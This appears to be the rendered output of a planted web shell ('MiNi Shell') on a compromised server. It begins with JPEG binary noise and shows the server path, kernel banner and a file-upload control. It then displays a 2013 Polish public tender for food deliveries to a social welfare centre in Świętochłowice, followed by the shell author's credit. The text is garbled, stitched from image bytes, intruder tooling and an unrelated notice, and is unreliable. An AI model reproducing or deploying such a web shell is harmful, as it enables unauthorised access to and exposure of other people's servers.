JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131003/401286-N-2013.html

<p class="kh_header"><b>Świętochłowice: DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH DLA OŚRODKA POMOCY SPOŁECZNEJ NA POTRZEBY ŻYWIENIA W PLACÓWKACH PODLEGŁYCH - W  PODZIALE  NA  6  PAKIETÓW</b><br>
<b>Numer ogłoszenia: 401286 - 2013; data zamieszczenia: 03.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Katowicka 35, 41-600 Świętochłowice, woj. śląskie, tel. 032 2455104, faks 032 2455104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-sw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH DLA OŚRODKA POMOCY SPOŁECZNEJ NA POTRZEBY ŻYWIENIA W PLACÓWKACH PODLEGŁYCH - W  PODZIALE  NA  6  PAKIETÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej  na potrzeby żywienia w placówkach podległych wraz z dostawą i rozładunkiem  w  magazynach Ośrodka Pomocy Społecznej w Świętochłowicach : 
Centrum Aktywizacji Osób Starszych - ul. Imieli 12, ul. Katowicka 35,
Środowiskowy Dom Samopomocy - ul. Karpacka 3, 
Przykładowy asortyment przedmiotu zamówienia określa załącznik nr 2 do niniejszej SIWZ - tabela
artykułów w zakresie każdego z 6 pakietów. Ilości artykułów podane w tabelach posiadają wartość szacunkową i będą uzależnione od aktualnych potrzeb Zamawiającego.
3.	Dostawy realizowane będą na podstawie zamówienia pisemnego przesyłanego faksem lub składanego telefonicznie w każdym następnym dniu po zgłoszeniu zamówienia lub w innym terminie uzgodnionym z Wykonawcą, w dni powszednie od poniedziałku do piątku w  godzinach od 07:00 do 15:00. 
4.	Wykonawca zobowiązany będzie do bezpłatnego dowozu towaru transportem spełniającym wymagania sanitarne oraz rozładunku wraz z wniesieniem do magazynów  określonych w ust 1. niniejszego paragrafu.  
5.	Wykonawca  zobowiązany będzie dostarczać zamawiany towar bezwzględnie w dni wyznaczone przez Zamawiającego.
6.	Wykonawca zobowiązany będzie dostarczyć towar I klasy jakości, świeży, spełniający normy jakościowe (PN) dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej.
7.	Każdy produkt musi być dopuszczony do obrotu i sprzedaży zgodnie z obowiązującymi  przepisami, oraz z warunkami określonymi w SIWZ, musi  posiadać początkowy  termin przydatności do spożycia.
8.	Wykonawca zabezpieczy należycie towar na czas przewozu (opakowania, pojemniki przystosowane do przewozu danego asortymentu) i ponosi całkowitą odpowiedzialność za dostawę i jakość dostarczonego towaru.
9.	Wykonawca weźmie na siebie odpowiedzialność za braki i wady powstałe w czasie transportu oraz poniesie z tego tytułu wszelkie skutki prawne.
10.	Przedmiot umowy Wykonawca zobowiązany jest wykonać zgodnie ze wzorem umowy ( załącznik nr 5 do SIWZ ) oraz SIWZ.
§ 4. Opis części zamówienia, jeżeli Zamawiający dopuszcza składanie ofert częściowych.
1.	Zamawiający  dopuszcza możliwość składania ofert częściowych. 
2.	Zamówienie będzie realizowane jako całość lub w podziale na  6 z wymienionych poniżej pakietów/ części :
Pakiet  nr 1	- Dostawa  mrożonek
Pakiet  nr 2	- Dostawa  chleba, wyrobów piekarniczych i cukierniczych  
Pakiet  nr 3	- Dostawa  warzyw i owoców 
Pakiet  nr 4	- Dostawa ryb.
Pakiet  nr 5	- Dostawa  drobiu
Pakiet  nr 6	-  Dostawa jaj.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.89.60.00-5, 15.81.00.00-9, 15.30.00.00-1, 15.20.00.00-0, 03.31.10.00-2, 15.11.20.00-6, 15.11.40.00-0, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ, na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-sw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Świętochłowicach,
ul. Katowicka 35,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2013 godzina 09:00, miejsce: Ośrodek Pomocy Społecznej w Świętochłowicach,
ul. Katowicka 35, pokój 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  NR 1:	Dostawa mrożonek 
(- 15331170-0, 15896000-5 - CPV)

LP.	WYSZCZEGÓLNIENIE
TOWARU	JEDNOSTKA MIARY	ILOŚĆ ZAMÓWIONA
W DOSTAWIE ROCZNEJ	CENA JEDNOSTKOWA BRUTTO
( ZŁ)	WARTOŚĆ BRUTTO
( ZŁ)
1.		Aronia	kg	100		
2.		Czarna porzeczka 	kg	800		
3.		Fasolka szparagowa	kg	400		
4.		Groszek zielony	kg	30		
5.		Kalafior 	kg	50		
6.		Kluski śląskie - 500 g	szt.	10		
7.		Lody na patyku - różne smaki 
- 110 ml	szt.	200		
8.	 	Lody - opak 1 kg - różne smaki 	kg	50		
9.		Marchew	kg	 10		
10.		Mieszanka jarzynowa - włoszczyzna paski wieloskładnikowa 	kg	      5000		
11.		Mieszanka z brokułami	kg	460		
12.		Pyzy z mięsem- paczka 500 g	szt.	          10		
13.		Pierogi z serem  	kg	 20		
14.		Pierogi z truskawkami	kg	 20		
15.		Szpinak brykiety	kg	500		
16.		Truskawki	kg	 50		
17.		Wiśnia 	kg	          30		
18.		Zupa jarzynowa- paczka 900 g	szt.	          10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-0, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa chleba, wyrobów piekarniczych i cukierniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  NR  2:	Dostawa chleba, wyrobów piekarniczych i cukierniczych 
(- 15810000-9 CPV) 

LP.	WYSZCZEGÓLNIENIE
TOWARU	JEDNOSTKA MIARY	ILOŚĆ 	CENA JEDNOSTKOWA BRUTTO
( ZŁ)	WARTOŚĆ BRUTTO
( ZŁ)
1.		Baton- 350g	szt.	2500		
2.		Bułka tarta	kg	50		
3.		Bułka mleczna 80g 	szt.	      1900		
4.		Bułka pszenna duża 100g 	szt.	      36000		
5.		Bułka pszenna mała 45g 	szt.	500		
6.		Chałka 300g	szt.	  5		
7.		Chleb mieszany 1000 g	szt.	    35500		
8.		Chleb razowy 500g	szt.	700		
9.		Rogal 80g	szt.	     2500		
10.		Babka różne smaki 400 g	szt.	50		
11.	Baranek świąteczny 450 g	szt.	30		
12.	Ciastko W-Z lub inne kremowe - 
waga ok. 145-155 g	szt.	1000		
13.	Ciastko półfrancuskie - różne smaki  80 g	szt.	400		
14.	Ciasto jogurtowe	kg	50		
15.	Ciasto z jabłkiem	kg	50		
16.	Ciasto ze śliwkami 	kg	50		
17.	Ciasto z posypką	kg	40		
18.	Ciasto z serem	kg	10		
19.	Drożdżówka różne smaki 80 g	szt.	500		
20.	Sernik 	kg	  4		
21. 	Strucla z makiem	kg	60		
22. 	Paczek z nadzieniem 80 g	szt.	1000		
23. 	Zając wielkanocny 450 g	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakośc - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  NR 3 :	Dostawa warzyw i owoców 
(- 15300000-1 CPV) 

LP.	WYSZCZEGÓLNIENIE
TOWARU	JEDNOSTKA MIARY	ILOŚĆ ZAMÓWIONA
W DOSTAWIE ROCZNEJ	CENA JEDNOSTKOWA BRUTTO
( ZŁ)	WARTOŚĆ BRUTTO
( ZŁ)
1.	Botwinka 
( min. 3 sztuki w pęczku)	pęczek	150		
2.	Brzoskwinie 	kg	  30		
3.	Buraki czerwone	kg	       1300		
4.	Cebula	kg	600		
5.	Czosnek	kg	 85		
6.	Jabłka	kg	       1300		
7.	Kalafior świeży
(nie mniejszy niż 15 cm średnicy)	szt.	350		
8.	Kalarepa
 ( min. 3 sztuki w pęczku)	pęczek	550		
9.	Kapusta biała	kg	       2500		
10.	Kapusta czerwona	kg	550		
11.	Kapusta pekińska	szt.	400		
12.	Kapusta włoska	kg	80		
13.	Koperek zielony	pęczek	950		
14.	Marchew	kg	      1400		
15.	Nektarynki	kg	30		
16.	Ogórek zielony	kg	180		
17.	Papryka czerwona	kg	20		
18.	Papryka żółta	kg	5		
19	Papryka zielona	kg	5		
20	Pieczarki	kg	450		
21	Pietruszka korzeń	kg	 25		
22	Pietruszka zielona	pęczek	750		
23.		Pomidory	kg	300		
24.		Por	kg	 20		
25.		Rzepa biała	kg	  3		
26.		Rzodkiewka	pęczek	40		
27.		Sałata zielona	szt.	        350		
28.		Seler korzeń	kg	 80		
29.		Szczypiorek	pęczek	95		
30.		Szpinak świeży	kg	 20		
31.		Śliwki	kg	 10		
32.		Winogrona białe	kg	70		
33.		Truskawki	kg	 80		
34.		Ziemniak stary ( od 01.12.2013 r.- 31.05.2014 r.)	kg	20000		
35.		Ziemniak nowy ( od 01.06.2014 r. - 31.12.2014 r.) - nie mniejszy niż 5-6 cm średnicy	kg	8000		
36.		Banan	kg	100		
37.		Cytryna	kg	20		
38.		Grejfrut	kg	10		
39.		Kapusta kiszona	kg	1500		
40.		Kiwi	szt.	100		
41.		Mandarynka	kg	120		
42.		Pomarańcza	kg	200		
43.		Ogórek kiszony	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  NR 4:	Dostawa  ryb 
( - 15200000-0, 03311000-2 CPV )

LP.	WYSZCZEGÓLNIENIE
TOWARU	JEDNOSTKA MIARY	ILOŚĆ ZAMÓWIONA
W DOSTAWIE ROCZNEJ	CENA JEDNOSTKOWA BRUTTO
( ZŁ)	WARTOŚĆ BRUTTO
( ZŁ)
1.		Filet z czerniaka
 (jednokrotnie glazurowany)	kg	200		
2.		Filet z  pangi
 (jednokrotnie glazurowany)	kg	400		
3.		Filet z mintaja 
(jednokrotnie glazurowany)	kg	 30		
4.		Filet z zielonego śledzia (jednokrotnie glazurowany)	kg	120		
5.		Karp żywy	kg	 20		
6.		Makrela wędzona 	kg	 120		
7.		Śledź matjas  (lekko solony)	kg	        320.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 03.31.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa drobiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET NR 5:	Dostawa drobiu 
(- 15112000-6, 15114000-6 - CPV )

LP.	WYSZCZEGÓLNIENIE
TOWARU	JEDNOSTKA MIARY	ILOŚĆ ZAMÓWIONA
W DOSTAWIE ROCZNEJ	CENA JEDNOSTKOWA BRUTTO
( ZŁ)	WARTOŚĆ BRUTTO
( ZŁ)
1.		Filet z indyka	kg	  5		
2.		Filet z kurczaka	kg	320		
3.		Gulasz drobiowy	kg	120		
4.		Gulasz z indyka	kg	400		
5.		Kurczak świeży	kg	1000		
6.		Porcje rosołowe z kurczaka	kg	 170		
7.		Udziec z indyka	kg	 80		
8.		Udka z kurczaka	kg	 15		
9.		Wątróbka drobiowa z kurczaka	kg	 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.40.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  NR 6 :	Dostawa jaj 
( - 03142500-3 CPV)

LP.	WYSZCZEGÓLNIENIE
TOWARU	JEDNOSTKA MIARY	ILOŚĆ ZAMÓWIONA
W DOSTAWIE ROCZNEJ	CENA JEDNOSTKOWA BRUTTO
( ZŁ)	WARTOŚĆ BRUTTO
( ZŁ)
1.		Jaja kurze- klasa- wagowa M, klasa jakości A	szt.	36 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com